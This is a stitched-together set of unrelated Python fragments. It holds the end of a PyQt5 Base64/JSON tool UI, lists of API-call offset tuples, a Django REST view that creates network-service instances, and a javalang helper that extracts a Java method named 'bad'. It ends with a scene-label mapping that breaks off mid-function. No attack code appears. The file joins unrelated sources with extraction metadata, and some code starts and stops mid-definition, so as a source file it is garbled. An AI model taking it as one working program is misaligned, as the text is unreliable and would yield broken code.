self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(self.tab)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.txtRaw = QtWidgets.QTextEdit(self.tab)
self.txtRaw.setObjectName("txtRaw")
self.verticalLayout.addWidget(self.txtRaw)
self.groupBox = QtWidgets.QGroupBox(self.tab)
self.groupBox.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox.setMaximumSize(QtCore.QSize(500, 16777215))
self.groupBox.setObjectName("groupBox")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnEncoding = QtWidgets.QPushButton(self.groupBox)
self.btnEncoding.setObjectName("btnEncoding")
self.horizontalLayout.addWidget(self.btnEncoding)
self.btnDecoding = QtWidgets.QPushButton(self.groupBox)
self.btnDecoding.setObjectName("btnDecoding")
self.horizontalLayout.addWidget(self.btnDecoding)
self.btnExchange = QtWidgets.QPushButton(self.groupBox)
self.btnExchange.setObjectName("btnExchange")
self.horizontalLayout.addWidget(self.btnExchange)
self.btnClear = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClear.sizePolicy().hasHeightForWidth())
self.btnClear.setSizePolicy(sizePolicy)
self.btnClear.setObjectName("btnClear")
self.horizontalLayout.addWidget(self.btnClear)
self.cboxCodecType = QtWidgets.QComboBox(self.groupBox)
self.cboxCodecType.setObjectName("cboxCodecType")
self.cboxCodecType.addItem("")
self.horizontalLayout.addWidget(self.cboxCodecType)
self.verticalLayout.addWidget(self.groupBox)
self.label_2 = QtWidgets.QLabel(self.tab)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.txtResult = QtWidgets.QTextEdit(self.tab)
self.txtResult.setObjectName("txtResult")
self.verticalLayout.addWidget(self.txtResult)
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.txtJson = QtWidgets.QTextEdit(self.tab_2)
self.txtJson.setObjectName("txtJson")
self.verticalLayout_2.addWidget(self.txtJson)
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 50))
self.groupBox_2.setObjectName("groupBox_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.groupBox_2)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btnJsonFormat = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonFormat.setObjectName("btnJsonFormat")
self.horizontalLayout_2.addWidget(self.btnJsonFormat)
self.btnJsonCompress = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCompress.setObjectName("btnJsonCompress")
self.horizontalLayout_2.addWidget(self.btnJsonCompress)
self.btnJsonEscape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonEscape.setObjectName("btnJsonEscape")
self.horizontalLayout_2.addWidget(self.btnJsonEscape)
self.btnJsonDeescape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonDeescape.setObjectName("btnJsonDeescape")
self.horizontalLayout_2.addWidget(self.btnJsonDeescape)
self.btnJsonCopy = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCopy.setObjectName("btnJsonCopy")
self.horizontalLayout_2.addWidget(self.btnJsonCopy)
self.btnJsonClear = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonClear.setObjectName("btnJsonClear")
self.horizontalLayout_2.addWidget(self.btnJsonClear)
self.verticalLayout_2.addWidget(self.groupBox_2)
self.tabWidget.addTab(self.tab_2, "")
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 963, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
self.btnClear.clicked.connect(self.txtResult.clear)
self.btnClear.clicked.connect(self.txtRaw.clear)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Set every user-visible string, routed through Qt's translate() so the UI can be localized."""
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        # Codec tab labels and buttons.
        self.label.setText(_translate("MainWindow", "Raw Text:"))
        self.groupBox.setTitle(_translate("MainWindow", "Operation"))
        self.btnEncoding.setText(_translate("MainWindow", "Encoding"))
        self.btnDecoding.setText(_translate("MainWindow", "Decoding"))
        self.btnExchange.setText(_translate("MainWindow", "Exchange"))
        self.btnClear.setText(_translate("MainWindow", "Clear"))
        self.cboxCodecType.setItemText(0, _translate("MainWindow", "Base64"))
        self.label_2.setText(_translate("MainWindow", "Result Text:"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Codec"))
        # Json tab labels and buttons.
        self.groupBox_2.setTitle(_translate("MainWindow", "Operation"))
        self.btnJsonFormat.setText(_translate("MainWindow", "Format"))
        self.btnJsonCompress.setText(_translate("MainWindow", "Compress"))
        self.btnJsonEscape.setText(_translate("MainWindow", "Escape"))
        self.btnJsonDeescape.setText(_translate("MainWindow", "De-Escape"))
        self.btnJsonCopy.setText(_translate("MainWindow", "Copy"))
        self.btnJsonClear.setText(_translate("MainWindow", "Clear"))
        self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Json"))
# Manual test entry point: build the generated UI on a bare QMainWindow and
# run the Qt event loop until the window is closed.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
| [
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QTextEdit",
"PyQt5.QtWidgets.QMainWindow",
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtWidgets.QHBoxLayout",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QStatusBar",
"PyQt5.QtWid... | [((7848, 7880), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (7870, 7880), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((7898, 7921), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (7919, 7921), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((432, 461), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainWindow'], {}), '(MainWindow)\n', (449, 461), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((546, 587), 'PyQt5.QtWidgets.QGridLayout', 'QtWidgets.QGridLayout', (['self.centralwidget'], {}), '(self.centralwidget)\n', (567, 587), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((665, 705), 'PyQt5.QtWidgets.QTabWidget', 'QtWidgets.QTabWidget', (['self.centralwidget'], {}), '(self.centralwidget)\n', (685, 705), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((727, 819), 'PyQt5.QtWidgets.QSizePolicy', 'QtWidgets.QSizePolicy', (['QtWidgets.QSizePolicy.Preferred', 'QtWidgets.QSizePolicy.Preferred'], {}), '(QtWidgets.QSizePolicy.Preferred, QtWidgets.\n QSizePolicy.Preferred)\n', (748, 819), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1235, 1254), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', ([], {}), '()\n', (1252, 1254), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1323, 1354), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self.tab'], {}), '(self.tab)\n', (1344, 1354), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1436, 1462), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.tab'], {}), '(self.tab)\n', (1452, 1462), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1577, 1606), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.tab'], {}), '(self.tab)\n', (1596, 1606), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1726, 1755), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['self.tab'], {}), '(self.tab)\n', (1745, 1755), False, 'from 
PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1959, 1995), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', (['self.groupBox'], {}), '(self.groupBox)\n', (1980, 1995), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2087, 2123), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2108, 2123), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2263, 2299), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2284, 2299), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2439, 2475), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2460, 2475), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2612, 2648), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox'], {}), '(self.groupBox)\n', (2633, 2648), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2670, 2760), 'PyQt5.QtWidgets.QSizePolicy', 'QtWidgets.QSizePolicy', (['QtWidgets.QSizePolicy.Minimum', 'QtWidgets.QSizePolicy.Preferred'], {}), '(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.\n Preferred)\n', (2691, 2760), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3105, 3139), 'PyQt5.QtWidgets.QComboBox', 'QtWidgets.QComboBox', (['self.groupBox'], {}), '(self.groupBox)\n', (3124, 3139), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3373, 3399), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.tab'], {}), '(self.tab)\n', (3389, 3399), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3523, 3552), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.tab'], {}), '(self.tab)\n', (3542, 3552), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3722, 3741), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', ([], {}), '()\n', (3739, 3741), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3816, 3849), 'PyQt5.QtWidgets.QVBoxLayout', 
'QtWidgets.QVBoxLayout', (['self.tab_2'], {}), '(self.tab_2)\n', (3837, 3849), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3937, 3968), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.tab_2'], {}), '(self.tab_2)\n', (3956, 3968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4095, 4126), 'PyQt5.QtWidgets.QGroupBox', 'QtWidgets.QGroupBox', (['self.tab_2'], {}), '(self.tab_2)\n', (4114, 4126), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4273, 4311), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4294, 4311), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4409, 4447), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4430, 4447), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4599, 4637), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4620, 4637), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4793, 4831), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (4814, 4831), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4983, 5021), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (5004, 5021), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5175, 5213), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (5196, 5213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5356, 5394), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.groupBox_2'], {}), '(self.groupBox_2)\n', (5377, 5394), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5756, 5786), 'PyQt5.QtWidgets.QMenuBar', 'QtWidgets.QMenuBar', (['MainWindow'], {}), '(MainWindow)\n', (5774, 5786), False, 'from PyQt5 import QtCore, QtGui, 
QtWidgets\n'), ((5964, 5996), 'PyQt5.QtWidgets.QStatusBar', 'QtWidgets.QStatusBar', (['MainWindow'], {}), '(MainWindow)\n', (5984, 5996), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6302, 6351), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainWindow'], {}), '(MainWindow)\n', (6339, 6351), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1072, 1092), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(571)', '(0)'], {}), '(571, 0)\n', (1084, 1092), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1132, 1164), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(16777215)', '(16777215)'], {}), '(16777215, 16777215)\n', (1144, 1164), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1793, 1811), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(0)', '(0)'], {}), '(0, 0)\n', (1805, 1811), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1850, 1877), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(500)', '(16777215)'], {}), '(500, 16777215)\n', (1862, 1877), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4166, 4185), 'PyQt5.QtCore.QSize', 'QtCore.QSize', (['(0)', '(50)'], {}), '(0, 50)\n', (4178, 4185), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5820, 5847), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(0)', '(0)', '(963)', '(23)'], {}), '(0, 0, 963, 23)\n', (5832, 5847), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')] |
# Copyright 2018 ZTE Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from lcm.ns.biz.ns_create import CreateNSService
from lcm.ns.biz.ns_get import GetNSInfoService
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer
from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer
from lcm.pub.exceptions import NSLCMException
from lcm.pub.exceptions import BadRequestException
from lcm.pub.utils.values import ignore_case_get
from .common import view_safe_call_with_log
# Module-level logger; also handed to the @view_safe_call_with_log decorators below.
logger = logging.getLogger(__name__)
class CreateNSView(APIView):
    """Deprecated NS-instance collection endpoint.

    GET lists all NS instances; POST creates a new NS instance from the
    request body (csarId / nsName / description / context).
    """

    @swagger_auto_schema(
        request_body=None,
        responses={
            status.HTTP_200_OK: _QueryNsRespSerializer(help_text="NS instances", many=True),
            status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
        }
    )
    @view_safe_call_with_log(logger=logger)
    def get(self, request):
        """Return every known NS instance, validated through the response serializer.

        Raises NSLCMException (turned into a 500 by the safe-call decorator)
        when the internal data does not pass serializer validation.
        """
        logger.debug("CreateNSView::get")
        ret = GetNSInfoService().get_ns_info()
        logger.debug("CreateNSView::get::ret=%s", ret)
        resp_serializer = _QueryNsRespSerializer(data=ret, many=True)
        if not resp_serializer.is_valid():
            raise NSLCMException(resp_serializer.errors)
        return Response(data=resp_serializer.data, status=status.HTTP_200_OK)

    @swagger_auto_schema(
        request_body=_CreateNsReqSerializer(),
        responses={
            status.HTTP_201_CREATED: _CreateNsRespSerializer(),
            status.HTTP_400_BAD_REQUEST: "Bad Request",
            status.HTTP_500_INTERNAL_SERVER_ERROR: "Inner error"
        }
    )
    @view_safe_call_with_log(logger=logger)
    def post(self, request):
        """Create an NS instance and return its id with HTTP 201.

        Raises BadRequestException (400) for an invalid request body and
        NSLCMException (500) when the response payload fails validation.
        """
        logger.debug("Enter CreateNS: %s", request.data)
        req_serializer = _CreateNsReqSerializer(data=request.data)
        if not req_serializer.is_valid():
            raise BadRequestException(req_serializer.errors)
        if ignore_case_get(request.data, 'test') == "test":
            # Test hook: short-circuit without invoking the business logic.
            return Response(
                data={'nsInstanceId': "test"},
                status=status.HTTP_201_CREATED
            )
        csar_id = ignore_case_get(request.data, 'csarId')
        ns_name = ignore_case_get(request.data, 'nsName')
        description = ignore_case_get(request.data, 'description')
        context = ignore_case_get(request.data, 'context')
        ns_inst_id = CreateNSService(
            csar_id,
            ns_name,
            description,
            context
        ).do_biz()
        logger.debug("CreateNSView::post::ret={'nsInstanceId':%s}", ns_inst_id)
        # NOTE(review): every field except nsInstanceId looks like a placeholder
        # included only to satisfy serializer validation — confirm with consumers.
        resp_serializer = _CreateNsRespSerializer(
            data={'nsInstanceId': ns_inst_id,
                  'nsInstanceName': 'nsInstanceName',
                  'nsInstanceDescription': 'nsInstanceDescription',
                  'nsdId': 123,
                  'nsdInfoId': 456,
                  'nsState': 'NOT_INSTANTIATED',
                  '_links': {'self': {'href': 'href'}}})
        if not resp_serializer.is_valid():
            raise NSLCMException(resp_serializer.errors)
        return Response(data=resp_serializer.data, status=status.HTTP_201_CREATED)
| [
"logging.getLogger",
"lcm.ns.serializers.deprecated.ns_serializers._CreateNsReqSerializer",
"lcm.pub.utils.values.ignore_case_get",
"lcm.ns.biz.ns_create.CreateNSService",
"lcm.ns.serializers.deprecated.ns_serializers._CreateNsRespSerializer",
"lcm.ns.serializers.deprecated.ns_serializers._QueryNsRespSeri... | [((1305, 1332), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1322, 1332), False, 'import logging\n'), ((1853, 1896), 'lcm.ns.serializers.deprecated.ns_serializers._QueryNsRespSerializer', '_QueryNsRespSerializer', ([], {'data': 'ret', 'many': '(True)'}), '(data=ret, many=True)\n', (1875, 1896), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer\n'), ((2012, 2074), 'rest_framework.response.Response', 'Response', ([], {'data': 'resp_serializer.data', 'status': 'status.HTTP_200_OK'}), '(data=resp_serializer.data, status=status.HTTP_200_OK)\n', (2020, 2074), False, 'from rest_framework.response import Response\n'), ((2525, 2566), 'lcm.ns.serializers.deprecated.ns_serializers._CreateNsReqSerializer', '_CreateNsReqSerializer', ([], {'data': 'request.data'}), '(data=request.data)\n', (2547, 2566), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer\n'), ((2886, 2925), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""csarId"""'], {}), "(request.data, 'csarId')\n", (2901, 2925), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((2944, 2983), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""nsName"""'], {}), "(request.data, 'nsName')\n", (2959, 2983), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((3006, 3050), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""description"""'], {}), "(request.data, 'description')\n", (3021, 3050), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((3069, 3109), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""context"""'], {}), "(request.data, 'context')\n", (3084, 3109), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((3361, 3618), 
'lcm.ns.serializers.deprecated.ns_serializers._CreateNsRespSerializer', '_CreateNsRespSerializer', ([], {'data': "{'nsInstanceId': ns_inst_id, 'nsInstanceName': 'nsInstanceName',\n 'nsInstanceDescription': 'nsInstanceDescription', 'nsdId': 123,\n 'nsdInfoId': 456, 'nsState': 'NOT_INSTANTIATED', '_links': {'self': {\n 'href': 'href'}}}"}), "(data={'nsInstanceId': ns_inst_id, 'nsInstanceName':\n 'nsInstanceName', 'nsInstanceDescription': 'nsInstanceDescription',\n 'nsdId': 123, 'nsdInfoId': 456, 'nsState': 'NOT_INSTANTIATED', '_links':\n {'self': {'href': 'href'}}})\n", (3384, 3618), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer\n'), ((3843, 3910), 'rest_framework.response.Response', 'Response', ([], {'data': 'resp_serializer.data', 'status': 'status.HTTP_201_CREATED'}), '(data=resp_serializer.data, status=status.HTTP_201_CREATED)\n', (3851, 3910), False, 'from rest_framework.response import Response\n'), ((1958, 1996), 'lcm.pub.exceptions.NSLCMException', 'NSLCMException', (['resp_serializer.errors'], {}), '(resp_serializer.errors)\n', (1972, 1996), False, 'from lcm.pub.exceptions import NSLCMException\n'), ((2627, 2669), 'lcm.pub.exceptions.BadRequestException', 'BadRequestException', (['req_serializer.errors'], {}), '(req_serializer.errors)\n', (2646, 2669), False, 'from lcm.pub.exceptions import BadRequestException\n'), ((2682, 2719), 'lcm.pub.utils.values.ignore_case_get', 'ignore_case_get', (['request.data', '"""test"""'], {}), "(request.data, 'test')\n", (2697, 2719), False, 'from lcm.pub.utils.values import ignore_case_get\n'), ((2750, 2821), 'rest_framework.response.Response', 'Response', ([], {'data': "{'nsInstanceId': 'test'}", 'status': 'status.HTTP_201_CREATED'}), "(data={'nsInstanceId': 'test'}, status=status.HTTP_201_CREATED)\n", (2758, 2821), False, 'from rest_framework.response import Response\n'), ((3789, 3827), 'lcm.pub.exceptions.NSLCMException', 'NSLCMException', (['resp_serializer.errors'], {}), 
'(resp_serializer.errors)\n', (3803, 3827), False, 'from lcm.pub.exceptions import NSLCMException\n'), ((2123, 2147), 'lcm.ns.serializers.deprecated.ns_serializers._CreateNsReqSerializer', '_CreateNsReqSerializer', ([], {}), '()\n', (2145, 2147), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsReqSerializer\n'), ((1739, 1757), 'lcm.ns.biz.ns_get.GetNSInfoService', 'GetNSInfoService', ([], {}), '()\n', (1755, 1757), False, 'from lcm.ns.biz.ns_get import GetNSInfoService\n'), ((1469, 1528), 'lcm.ns.serializers.deprecated.ns_serializers._QueryNsRespSerializer', '_QueryNsRespSerializer', ([], {'help_text': '"""NS instances"""', 'many': '(True)'}), "(help_text='NS instances', many=True)\n", (1491, 1528), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _QueryNsRespSerializer\n'), ((3131, 3186), 'lcm.ns.biz.ns_create.CreateNSService', 'CreateNSService', (['csar_id', 'ns_name', 'description', 'context'], {}), '(csar_id, ns_name, description, context)\n', (3146, 3186), False, 'from lcm.ns.biz.ns_create import CreateNSService\n'), ((2206, 2231), 'lcm.ns.serializers.deprecated.ns_serializers._CreateNsRespSerializer', '_CreateNsRespSerializer', ([], {}), '()\n', (2229, 2231), False, 'from lcm.ns.serializers.deprecated.ns_serializers import _CreateNsRespSerializer\n')] |
#!/usr/bin/env python3
import javalang
def isPrimitive(obj):
    """Return True when *obj* carries no instance attribute dictionary,
    i.e. it is a "primitive" value rather than an AST node object."""
    has_attribute_dict = hasattr(obj, '__dict__')
    return not has_attribute_dict
def extract_bad_function_from_text(src):
    """Shortcut for extract_function_from_text(src, criterion='bad')."""
    criterion = 'bad'
    return extract_function_from_text(src, criterion=criterion)
def extract_function_from_text(src, criterion='bad'):
    """Return the source text of the Java method named *criterion* in *src*.

    *src* may be a str or UTF-8 bytes.  Returns '' when no matching method
    exists; returns None (after printing a diagnostic) when the source fails
    to parse, matching the original error behavior.
    """
    def recursive_find_deepest_child_position(node_body, prev_deepest=0):
        # Depth-first walk over the AST returning the largest line number
        # seen, which approximates the last source line of the method body.
        if isinstance(node_body, list):
            deepest_position = prev_deepest
            # BUGFIX: the original filter was `c is not isPrimitive(c)`,
            # an identity comparison against a bool that never excluded
            # anything; the intent is to skip primitives and None.
            node_children = [c for c in node_body if not isPrimitive(c) and c is not None]
        else:
            if node_body.position is not None:
                deepest_position = node_body.position.line
            else:
                deepest_position = prev_deepest
            node_children = [c for c in node_body.children if not isPrimitive(c) and c is not None]
        if len(node_children) == 0:
            return deepest_position
        for child in node_children:
            try:
                if child.position is not None:
                    child_sub_pos = child.position.line
                else:
                    child_sub_pos = deepest_position
                child_direct_child_set = child.children
            except AttributeError:
                # child is not an AST node (e.g. a nested plain list)
                child_sub_pos = deepest_position
                if isinstance(child, list):
                    child_direct_child_set = child
                else:
                    child_direct_child_set = []
            if len(child_direct_child_set) > 0:
                child_sub_pos = recursive_find_deepest_child_position(child_direct_child_set, prev_deepest=child_sub_pos)
            if child_sub_pos > deepest_position:
                deepest_position = child_sub_pos
        return deepest_position

    if not isinstance(src, str):
        src = src.decode('utf-8')
    src_split = src.split('\n')
    try:
        tree = javalang.parse.parse(src)
        for _, node in tree.filter(javalang.tree.MethodDeclaration):
            if node.name.lower() == str(criterion).lower():
                # javalang cannot serialize an AST back to Java source, so
                # slice the raw text between the method's first line and the
                # deepest line reached by its last body statement.
                start_pos = node.position.line
                end_pos = None
                if (len(node.body) > 0):
                    end_pos = recursive_find_deepest_child_position(node.body[-1])
                if end_pos is None:
                    end_pos = start_pos
                function_text = ""
                for line in range(start_pos, end_pos + 1):
                    function_text += src_split[line - 1]  # positions are 1-based
                return function_text
        return ""
    except (javalang.parser.JavaSyntaxError,
            javalang.parser.JavaParserError) as e:
        print("ERROR OCCURRED DURING PARSING")
        print(e)
def extract_bad_function(file_path):
    """Extract the method named 'bad' from the Java file at *file_path*."""
    return extract_function(file_path, 'bad')
def extract_function(file_path, criterion):
    """Read the Java file at *file_path* and extract the method named *criterion*.

    The file is decoded explicitly as UTF-8 to match
    extract_function_from_text(), which assumes UTF-8 when handed raw bytes;
    relying on the locale's default encoding could mis-decode sources on
    some platforms (e.g. Windows cp1252).
    """
    with open(file_path, 'r', encoding='utf-8') as f:
        return extract_function_from_text(f.read(), criterion)
| [
"javalang.parse.parse"
] | [((2088, 2113), 'javalang.parse.parse', 'javalang.parse.parse', (['src'], {}), '(src)\n', (2108, 2113), False, 'import javalang\n')] |
import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
# Place-name -> class-index mapping for the 22 scene classes.  The empty
# string and 'none' both map to index 9 so unlabeled frames fall into the
# explicit 'none' bucket.
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
              'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
              'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
              }
# Same mapping without the empty-string alias; label_remapping() inverts this
# dict to recover place names from class indices.
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
                      'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
                      'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
                      }
def label_mapping(target):
    """Map each [place_name, ...] entry of *target* to its label_dict index.

    Side effect: any place name starting with 'con' is normalized in place to
    'convenience store' before the lookup (mirrors the dataset's abbreviated
    labels).
    """
    indices = []
    for entry in target:
